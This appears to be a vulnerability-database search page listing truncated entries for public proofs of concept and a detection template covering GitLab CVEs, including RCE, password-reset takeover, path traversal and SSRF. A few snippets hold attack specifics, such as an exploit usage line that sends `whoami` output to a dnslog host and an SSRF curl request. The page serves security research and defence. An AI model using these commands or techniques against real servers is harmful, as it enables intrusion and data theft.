Lucene search
+L

771 matches found

Kitploit
Kitploit
added 2026/09/21 8:47 a.m.9 views

CVE-2023-7028

CVE-2023-7028 An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be...

10CVSS8AI score0.94647EPSS
SaveExploits16References3
Kitploit
Kitploit
added 2026/09/21 2:05 a.m.7 views

CVE-2021-22205

CVE-2021-22205 Description - POC for CVE-2021-22205: Gitlab CE/EE RCE 未授权远程代码执行漏洞 POC && EXP - create by antx at 2021-10-29. Detail - An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file...

10CVSS8AI score0.99731EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/09/20 10:52 p.m.11 views

CVE-2023-2825

CVE-2023-2825 Unauthenticated Directory traversal leads to file read. Summary of the CVE An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment...

10CVSS7.8AI score0.71641EPSS
SaveExploits5References2
Kitploit
Kitploit
added 2026/09/20 7:53 p.m.10 views

CVE-2021-22214

CVE-2021-22214 Description - POC for CVE-2021-22214: Gitlab CI Lint API未授权 SSRF漏洞 - create by antx at 2021-11-01. Detail - When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was...

8.6CVSS7.8AI score0.27806EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/20 7:15 p.m.11 views

gitlab-exploit

gitlab-exploit GitLab CVE-2023-7028 GitLab CVE-2023-7028 The vulnerability was caused by a bug in how GitLab handled email verification during password reset. An attacker could provide two email addresses during a password reset request, and the reset code would be sent to both addresses. This...

10CVSS8.1AI score0.94647EPSS
SaveExploits16
Kitploit
Kitploit
added 2026/09/20 6:48 p.m.11 views

CVE-2021-22205

CVE-2021-22205 GitLab fails to properly verify image files passed to the file parser, leading to command execution. An attacker can craft malicious requests to exploit this vulnerability and execute arbitrary commands on the target system, ultimately taking control of the GitLab server. Since mos...

10CVSS8.8AI score0.99731EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/09/20 5:20 p.m.6 views

CVE-2021-22205

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. Vuln Product Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE...

10CVSS7.8AI score0.99731EPSS
SaveExploits29
Kitploit
Kitploit
added 2026/09/20 3:37 p.m.9 views

CVE-2021-22205

CVE-2021-22205 Preauth RCE via exiftool on Gitlab CE/EE Summary of the CVE GitLab uses ExifTool to scan every tiff/jpeg/jpg file to remove any tags that are not whitelisted. But because ExifTool doesn't use file extensions to determine filetype but it rather uses the content of the file, which...

10CVSS8.4AI score0.99731EPSS
SaveExploits29References2
Kitploit
Kitploit
added 2026/09/20 1:50 p.m.8 views

CVE-2022-2992

CVE-2022-2992 Authenticated Remote Command Execution in Gitlab via GitHub import. A vulnerability in GitLab CE/EE affecting all versions from 11.10 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. allows an authenticated user to achieve...

9.9CVSS8.7AI score0.86194EPSS
SaveExploits5References3
Kitploit
Kitploit
added 2026/09/20 12:35 p.m.8 views

Review.CVE-2023-5612

CVE-2023-5612 – GitLab SSRF via Webhook URL PoC & Analysis 📌 CVE Overview CVE-ID: CVE-2023-5612 Severity: High CVSS: 8.1 Base Score Type: Server-Side Request Forgery SSRF Component: GitLab CE/EE Webhooks Affected Versions: GitLab CE/EE " \ --data-urlencode "url=http://127.0.0.1:8888" ...

5.3CVSS6.9AI score0.04867EPSS
SaveExploits3References1
Kitploit
Kitploit
added 2026/09/20 11:53 a.m.9 views

CVE-2021-22205

CVE-2021-22205 Affected versions: Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage root@kitploit: python3 CVE-2021-22205.py target "curl \whoami.dnslog" Get csrf-token: Obtain the csrf-token via /users/signin, then use the previous CVE-2021-22205 POC to construct and execute an...

10CVSS8.6AI score0.99731EPSS
SaveExploits29References2
Kitploit
Kitploit
added 2026/09/20 7:58 a.m.6 views

GitLab-CVE-2023-7028

GitLab CVE-2023-7028 — 模拟 16.6.0(仅主机) CVE-2023-7028(CVSS 10.0):POST /users/password 接受 useremail 数组 — 服务器通过 email0 查找用户,但将相同的重置令牌发送到 每个 地址 → 攻击者使用 [email protected] 劫持 [email protected]。 受影响版本:GitLab CE/EE 16.5.6、16.6.4、16.7.2。此模拟复现 16.6.0 易受攻击的流程(JSON 数据库,无 SMTP)。 运行 npm install && npm...

10CVSS8.3AI score0.94647EPSS
SaveExploits16
Kitploit
Kitploit
added 2026/09/20 4:36 a.m.15 views

cve-2026-85706-poc-exploit-gitlab

cve-2026-85706 GitLab CE/EE 中未经身份验证的任意本地文件读取。影响 18.7–19.1.7、19.2.0–19.2.5、19.3.0–19.3.1。已在 19.1.8 / 19.2.6 / 19.3.2 中修复(2026-09-10)。CVSS 10.0,据称已在野利用。原始报告由 s3ntago 提交,本仓库只是我的分析文章 + PoC。 免责声明 本 PoC 仅出于教育和防御性研究目的发布,旨在帮助管理员和研究人员理解并测试该漏洞。请仅针对你拥有或已获得明确书面授权测试的系统运行它。如果你的实例处于受影响范围内,请停止阅读并先修补到 19.1.8 /...

10CVSS8.4AI score0.14563EPSS
SaveExploits11
Nuclei
Nuclei
added 2026/09/20 2:05 a.m.33 views

GitLab CE/EE <=19.1.7/19.2.5/19.3.1 - Arbitrary File Read

GitLab CE/EE contains an unauthenticated arbitrary file read. Workhorse, the reverse proxy in front of Rails, matches upload routes using EscapedPath and path.Clean without decoding percent sequences, while Puma decodes them before routing to Grape. Appending a trailing slash to commits or...

10CVSS8.2AI score0.14563EPSS
SaveExploits11References5
Kitploit
Kitploit
added 2026/09/20 1:04 a.m.8 views

CVE-2026-85706

CVE-2026-85706:GitLab CE/EE 未认证任意本地文件读取 CVE-2026-85706 是 GitLab CE/EE Repository Commits 和 Repository Files API 中的一个严重路径遍历 / 缺失认证问题:未认证的攻击者可以让服务器读取任意文件,并通过错误通道获取其内容。CVSS 3.1 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N)。 GitLab 的官方标题是 “Path Traversal issue in repository commits API impacts...

10CVSS8.5AI score0.14563EPSS
SaveExploits11References1
Kitploit
Kitploit
added 2026/09/19 3:04 p.m.19 views

gitlab-cve-2026-85706-ioc

CVE-2026-85706 — GitLab Path Traversal IOC Scanner & Detection Toolkit GitLab CE/EE Repository Commits API Unauthenticated Path Traversal CVSS 3.1: 10.0, Critical Status: Actively exploited in the wild · Listed in CISA KEV 2026-09-11, due 2026-09-14 · Patched by GitLab 2026-09-10 A free,...

10CVSS8.4AI score0.14563EPSS
SaveExploits11References15
Kitploit
Kitploit
added 2026/09/19 1:04 p.m.9 views

gitlab-ssrf

GitLab SSRF This repository is a reproduction of CVE-2018-19571, and how when combined with a CRLF injection exploit, can lead to remote code execution RCE. CVE Details CVE-2018-19571 GitLab CE/EE, versions 8.18 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable...

7.7CVSS8AI score0.2819EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/19 12:42 p.m.10 views

CVE-2023-2825

CVE-2023-2825 On May 23, 2023 GitLab released version 16.0.1 which fixed a critical vulnerability, CVE-2023-2825, affecting the Community Edition CE and Enterprise Edition EE version 16.0.0. The vulnerability allows unauthenticated users to read arbitrary files through a path traversal bug...

10CVSS8.1AI score0.71641EPSS
SaveExploits5
Kitploit
Kitploit
added 2026/09/19 8:51 a.m.11 views

CVE-2022-1162

CVE-2022-1162 A hardcoded password was set for accounts registered using an OmniAuth provider e.g. OAuth, LDAP, SAML in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts. Exploit: New Gitlab Accounts...

9.8CVSS8.3AI score0.76177EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/18 11:55 p.m.11 views

CVE-2026-85706

CVE-2026-85706:GitLab CE/EE 未授权路径遍历 CVE :CVE-2026-85706,CVSS 3.1 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N) 组件 :GitLab CE/EE Repository Commits API(Workhorse body-upload 变体) 影响 :18.7 ≤ version ,经 badrequest! 原样回显进 400 响应。回显先到先得:& / = 是组件边界,解析在第一个非法 % 所在组件处中断并回显该组件,无分隔符时整个文件作为一个组件整体回显(合法的 %xx...

10CVSS8.6AI score0.14563EPSS
SaveExploits11
Rows per page
Query Builder